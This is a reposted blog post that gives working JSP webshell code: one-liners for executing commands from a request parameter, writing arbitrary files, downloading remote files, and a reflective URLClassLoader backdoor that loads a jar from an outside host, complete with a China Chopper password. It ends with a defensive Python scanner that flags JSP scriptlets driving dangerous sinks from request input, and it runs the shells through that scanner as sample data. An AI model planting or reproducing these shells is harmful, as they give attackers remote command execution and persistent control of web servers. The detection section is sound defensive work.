Posted on 1/2/2015 6:46:57 PM
Reposted from: http://p2j.cn/?p=1627

1. Execute system commands

Execute a system command without echoing its output:

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

Request: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls

Nothing is echoed after execution, which is very convenient for reverse shells.

With output echoed and a password check:

<%
if("023".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>

Request: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Write a string to a specified file

Variant 1, with FileOutputStream:

<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>

Request: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

Write into the web directory:

<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>

Request: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

Variant 2, with RandomAccessFile:

<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>

Request: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

Write into the web directory:

<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>

Request: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

3. Download a remote file

(Without Apache Commons IO there is no one-liner to read an InputStream into a byte array, so this one is long...)

<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
    baos.write(b, 0, a);
}
new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray());
%>

Request: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png

Download into the web path:

<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
    baos.write(b, 0, a);
}
new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray());
%>

Request: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png

4. Reflectively call an external jar: the perfected backdoor

If you think the backdoors above are too weak and dated, try this:

<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>

Request: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

China Chopper (菜刀) connection: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, password 023.

Explanation: reflection loads an external jar into the current application, then reflectively invokes it and outputs the result of the processing. request.getParameterMap() holds all the parameters of the request. Because the external jar is loaded over the network, the server must be able to reach that jar's address.
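Every shell on this page shares one shape: a JSP scriptlet that feeds a dangerous sink (Runtime.exec, a file writer, URLClassLoader) directly from request.getParameter. That shape is what a defender should hunt for in deployed JSP files. The scanner below is an added example written for this page, not code from the original post; it tags a scriptlet as "tainted" when it both reads request parameters and calls one of the listed sinks, and it uses the post's own one-liners plus two constructed benign pages (hello.jsp, rotate.jsp) as sample input. The sink list and the three-way classification are my assumptions, chosen to keep false positives low rather than to be exhaustive.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Java APIs that a JSP page rarely has a legitimate reason to drive straight
# from request input. The trailing "(" keeps "java.net.URL(" from matching
# "java.net.URLClassLoader(".
SINKS = {
    "Runtime.getRuntime().exec(": "command execution",
    "ProcessBuilder(": "command execution",
    "FileOutputStream(": "file write",
    "RandomAccessFile(": "file write",
    "URLClassLoader(": "remote class loading",
    "Class.forName(": "reflective class loading",
    "java.net.URL(": "remote fetch",
}

# Any read of request parameters inside the same scriptlet counts as taint.
TAINT = re.compile(r"request\.getParameter(?:Map|Values|Names)?\s*\(")
# Scriptlets (<% %>, <%= %>, <%@ %>) but not JSP comments (<%-- --%>).
SCRIPTLET = re.compile(r"<%(?!--)(.*?)%>", re.S)


@dataclass(frozen=True)
class Finding:
    line: int       # 1-based line on which the scriptlet starts
    sink: str       # the API that is called
    label: str      # what that API lets a caller do
    tainted: bool   # the same scriptlet also reads request parameters


def scan_jsp(source: str) -> list[Finding]:
    """Return one Finding per dangerous sink per scriptlet in a JSP source."""
    findings: list[Finding] = []
    for m in SCRIPTLET.finditer(source):
        body = m.group(1)
        line = source.count("\n", 0, m.start()) + 1
        tainted = TAINT.search(body) is not None
        for sink, label in SINKS.items():
            if sink in body:
                findings.append(Finding(line, sink[:-1], label, tainted))
    return findings


def classify(source: str) -> str:
    """'webshell-like' if any sink is request-driven, 'review' if a sink is
    present but hard-coded, otherwise 'clean'."""
    findings = scan_jsp(source)
    if any(f.tainted for f in findings):
        return "webshell-like"
    if findings:
        return "review"
    return "clean"


# Sample input: the one-liners from the post above, used here only as data
# for the scanner, plus two constructed pages that must not be flagged as shells.
SAMPLES = {
    "cmd2.jsp": '<%Runtime.getRuntime().exec(request.getParameter("i"));%>',
    "file.jsp": '<%new java.io.FileOutputStream(application.getRealPath("/")+"/"'
                '+request.getParameter("f")).write(request.getParameter("c").getBytes());%>',
    "reflect.jsp": '<%=Class.forName("Load",true,new java.net.URLClassLoader('
                   'new java.net.URL[]{new java.net.URL(request.getParameter("u"))}))'
                   '.getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>',
    # Constructed: reads a parameter but only renders it; no sink, so "clean".
    "hello.jsp": '<%@ page contentType="text/html" %>\n'
                 '<% String who = request.getParameter("who"); %>\n'
                 '<p>Hello, <%= who == null ? "guest" : who.replace("<", "&lt;") %></p>',
    # Constructed: a hard-coded exec with no request input; worth a look, not a shell.
    "rotate.jsp": '<%-- nightly maintenance hook --%>\n'
                  '<% Runtime.getRuntime().exec("/usr/sbin/logrotate /etc/logrotate.conf"); %>',
}


def report(samples: dict[str, str] | None = None) -> dict[str, str]:
    """Classify each named JSP source; defaults to the embedded samples."""
    return {name: classify(src) for name, src in (samples or SAMPLES).items()}


if __name__ == "__main__":
    for name, verdict in report().items():
        print(f"{name:12s} {verdict}")
        for f in scan_jsp(SAMPLES[name]):
            flag = "TAINTED" if f.tainted else "static"
            print(f"    line {f.line}: {f.sink} ({f.label}, {flag})")
```

The taint rule is deliberately coarse: it only asks whether request input and a sink appear in the same scriptlet, so it will also flag a sink driven by a parameter that was validated earlier in the same block. For a deployed application that is the right bias; a hit means a human reads the file, and a page that turns out to be "review" is cleared quickly. Running this over a webapp's exploded directory, or comparing it against the sink inventory of the released WAR, is the cheap check that catches all four shells on this page.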